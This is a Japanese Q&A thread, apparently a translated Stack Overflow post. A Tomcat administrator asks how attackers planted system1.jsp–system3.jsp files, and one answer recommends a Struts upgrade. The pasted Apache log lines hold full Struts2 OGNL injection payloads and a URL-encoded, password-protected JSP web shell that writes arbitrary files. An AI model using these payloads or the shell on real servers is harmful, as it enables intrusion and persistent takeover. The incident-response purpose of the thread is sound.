11

最近、Tomcat サーバーにいくつかのファイルが表示されましたが、これは明らかにハッカーの試みです。struts と ibatis を他のさまざまなフレームワークと共に使用する古いアプリケーションをサポートしています。実際の webapp ディレクトリの下に system1.jsp などの 3 つのファイルが作成され、tomcat/webapps/ROOT/system1.jsp次に と の下に作成された他の 2 つのファイルが作成されましtomcat/webapps/system2.jsptomcat/webapps/system3.jsp

これらのファイルの内容は奇妙で、ユーザー アカウントを作成しようとしているように見えます。とにかく、Struts が設定された方法では、実際にそれらの jsp ファイルに到達する方法はありません。私が心配しているのは、これらのファイルを作成できたという事実です。どうすればこれを防ぐことができますか?

これは、ハックからのApacheログと残りのコードです。

198.211.11.202 - - [28/Apr/2013:02:05:34 -0500] "GET request!start.do?
('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)
(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i12)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i13)(('\\43xman.getWriter().println(\\43req.getServletContext().getRealPath(%22\\u005c%22))')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(new\\40java.lang.StringBuilder(\\43req.getRealPath(%22\\u005c%22)).append(@java.io.File@separator).append(%22system1.jsp%22).toString())')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t=%3C%25%40page+contentType%3D%22text%2Fhtml%3B+charset%3DGBK%22+import%3D%22java.io.*%3B%22%25%3E%0A%3C%25%21private+String+password%3D%22hehe%22%3B%2F%2F%E6%B7%87%EE%86%BD%E6%95%BC%E7%80%B5%E5%97%99%E7%88%9C%25%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3Ehahahaha%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+bgcolor%3D%22%23ffffff%22%3E%0A%3C%25%0AString+act%3D%22%22%3B%0AString+path%3Drequest.getParameter%28%22path%22%29%3B%0AString+content%3Drequest.getParameter%28%22content%22%29%3B%0AString+url%3Drequest.getRequestURI%28%29%3B%0AString+url2%3Drequest.getRealPath%28request.getServletPath%28%29%29%3B%0Atry%0A%7Bact%3Drequest.getParameter%28%22act%22%29.toString%28%29%3B%7D%0Acatch%28Exception+e%29%7B%7D%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29%21%3Dnull%29%0A%7B%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29.toString%28%29.equals%28%22hehe%22%29%29%0A%7B%0Aif+%28path%21%3Dnull+%26%26+%21path.equals%28%22%22%29+%26%26+content%21%3Dnull+%26%26+%21content.equals%28%22%22%29%29%0A%7B%0A+++try%7B%0A+++++File+newfile%3Dnew+File%28path%29%3B%0A+++++PrintWriter+writer%3Dnew+PrintWriter%28newfile%29%3B%0A+++++writer.println%28content%29%3B%0A+++++writer.close%28%29%3B%0A+++++if+%28newfile.exists%28%29+%26%26+newfile.length%28%29%3E0%29%0A+++++%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+ok%21%3C%2Ffont%3E%22%29%3B%0A+++++%7Delse%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+erry%21%3C%2Ffont%3E%22%29%3B%0A+++++%7D%0A+++%7Dcatch%28Exception+e%29%0A+++%7B%0A+++++e.printStackTrace%28%29%3B%0A+++%7D%0A%7D%0Aout.println%28%22%3Cform+action%3D%22%2Burl%2B%22+method%3Dpost%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3%3E%3Cbr%3E%3C%2Ffont%3E%3Cinput+type%3Dtext+size%3D54+name%3D%27path%27%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3+color%3Dred%3E%22%2Burl2%2B%22%3C%2Ffont%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Ctextarea+name%3D%27content%27+rows%3D15+cols%3D50%3E%3C%2Ftextarea%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+value%3D%27save%21%27%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%22%29%3B%0A%7D%0A%7Delse%7B%0Aout.println%28%22%3Cdiv+align%3D%27center%27%3E%3Cform+action%3D%27%3Fact%3Dlogin%27+method%3D%27post%27%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27password%27+name%3D%27pass%27%2F%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+name%3D%27update%27+class%3D%27unnamed1%27+value%3D%27Login%27+%2F%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%3C%2Fdiv%3E%22%29%3B%0A%7Dif%28act.equals%28%22login%22%29%29%0A%7B%0A++++String+pass%3Drequest.getParameter%28%22pass%22%29%3B%0A++++if%28pass.equals%28password%29%29%0A++++%7B%0A+++++session.setAttribute%28%22hehe%22%2C%22hehe%22%29%3B%0A+++++String+uri%3Drequest.getRequestURI%28%29%3B+++%0A+++++uri%3Duri.substring%28uri.lastIndexOf%28%22%2F%22%29%2B1%29%3B+%0A++++response.sendRedirect%28uri%29%3B%0A++++%7Delse%0A++++%7B%0Aout.println%28%22Error%22%29%3B%0Aout.println%28%22%3Ca+href%3D%27javascript%3Ahistory.go%28-1%29%27%3E%3Cfont+color%3D%27red%27%3Ego+back%3C%2Ffont%3E%3C%2Fa%3E%3C%2Fdiv%3E%3Cbr%3E%22%29%3B%0A++++%7D%0A++++%7D%0A%25%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E HTTP/1.1" 200 12387
198.211.11.202 - - [28/Apr/2013:02:05:35 -0500] "GET /request!start.do?('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43req.getRealPath(%22\\u005c%22))')(d))&(i99)(('\\43xman.getWriter().close()')(d)) HTTP/1.1" 200 29
198.211.11.202 - - [28/Apr/2013:02:05:35 -0500] "GET /request!start.do?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(\\43req.getParameter(%22path%22))')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t=%3C%25%40page+contentType%3D%22text%2Fhtml%3B+charset%3DGBK%22+import%3D%22java.io.*%3B%22%25%3E%0A%3C%25%21private+String+password%3D%22hehe%22%3B%2F%2F%E6%B7%87%EE%86%BD%E6%95%BC%E7%80%B5%E5%97%99%E7%88%9C%25%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3Ehahahaha%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+bgcolor%3D%22%23ffffff%22%3E%0A%3C%25%0AString+act%3D%22%22%3B%0AString+path%3Drequest.getParameter%28%22path%22%29%3B%0AString+content%3Drequest.getParameter%28%22content%22%29%3B%0AString+url%3Drequest.getRequestURI%28%29%3B%0AString+url2%3Drequest.getRealPath%28request.getServletPath%28%29%29%3B%0Atry%0A%7Bact%3Drequest.getParameter%28%22act%22%29.toString%28%29%3B%7D%0Acatch%28Exception+e%29%7B%7D%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29%21%3Dnull%29%0A%7B%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29.toString%28%29.equals%28%22hehe%22%29%29%0A%7B%0Aif+%28path%21%3Dnull+%26%26+%21path.equals%28%22%22%29+%26%26+content%21%3Dnull+%26%26+%21content.equals%28%22%22%29%29%0A%7B%0A+++try%7B%0A+++++File+newfile%3Dnew+File%28path%29%3B%0A+++++PrintWriter+writer%3Dnew+PrintWriter%28newfile%29%3B%0A+++++writer.println%28content%29%3B%0A+++++writer.close%28%29%3B%0A+++++if+%28newfile.exists%28%29+%26%26+newfile.length%28%29%3E0%29%0A+++++%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+ok%21%3C%2Ffont%3E%22%29%3B%0A+++++%7Delse%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+erry%21%3C%2Ffont%3E%22%29%3B%0A+++++%7D%0A+++%7Dcatch%28Exception+e%29%0A+++%7B%0A+++++e.printStackTrace%28%29%3B%0A+++%7D%0A%7D%0Aout.println%28%22%3Cform+action%3D%22%2Burl%2B%22+method%3Dpost%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3%3E%3Cbr%3E%3C%2Ffont%3E%3Cinput+type%3Dtext+size%3D54+name%3D%27path%27%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3+color%3Dred%3E%22%2Burl2%2B%22%3C%2Ffont%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Ctextarea+name%3D%27content%27+rows%3D15+cols%3D50%3E%3C%2Ftextarea%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+value%3D%27save%21%27%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%22%29%3B%0A%7D%0A%7Delse%7B%0Aout.println%28%22%3Cdiv+align%3D%27center%27%3E%3Cform+action%3D%27%3Fact%3Dlogin%27+method%3D%27post%27%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27password%27+name%3D%27pass%27%2F%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+name%3D%27update%27+class%3D%27unnamed1%27+value%3D%27Login%27+%2F%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%3C%2Fdiv%3E%22%29%3B%0A%7Dif%28act.equals%28%22login%22%29%29%0A%7B%0A++++String+pass%3Drequest.getParameter%28%22pass%22%29%3B%0A++++if%28pass.equals%28password%29%29%0A++++%7B%0A+++++session.setAttribute%28%22hehe%22%2C%22hehe%22%29%3B%0A+++++String+uri%3Drequest.getRequestURI%28%29%3B+++%0A+++++uri%3Duri.substring%28uri.lastIndexOf%28%22%2F%22%29%2B1%29%3B+%0A++++response.sendRedirect%28uri%29%3B%0A++++%7Delse%0A++++%7B%0Aout.println%28%22Error%22%29%3B%0Aout.println%28%22%3Ca+href%3D%27javascript%3Ahistory.go%28-1%29%27%3E%3Cfont+color%3D%27red%27%3Ego+back%3C%2Ffont%3E%3C%2Fa%3E%3C%2Fdiv%3E%3Cbr%3E%22%29%3B%0A++++%7D%0A++++%7D%0A%25%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E&path=/opt/tomcat/webapp/ROOT/system2.jsp HTTP/1.1" 200 12387
4

1 に答える 1

6

ここにリストされている脆弱性は、あなたが見ているものと非常によく一致していると思います: http://www.exploit-db.com/exploits/14360/

したがって、これは Struts/XWork フレームワークに問題があるようです。それを新しいバージョンにアップグレードすることを検討する必要があります。この特定の脆弱性レポートによると、バージョン 2.2.0 でこの問題が修正されています。

于 2013-05-07T18:22:14.387 に答える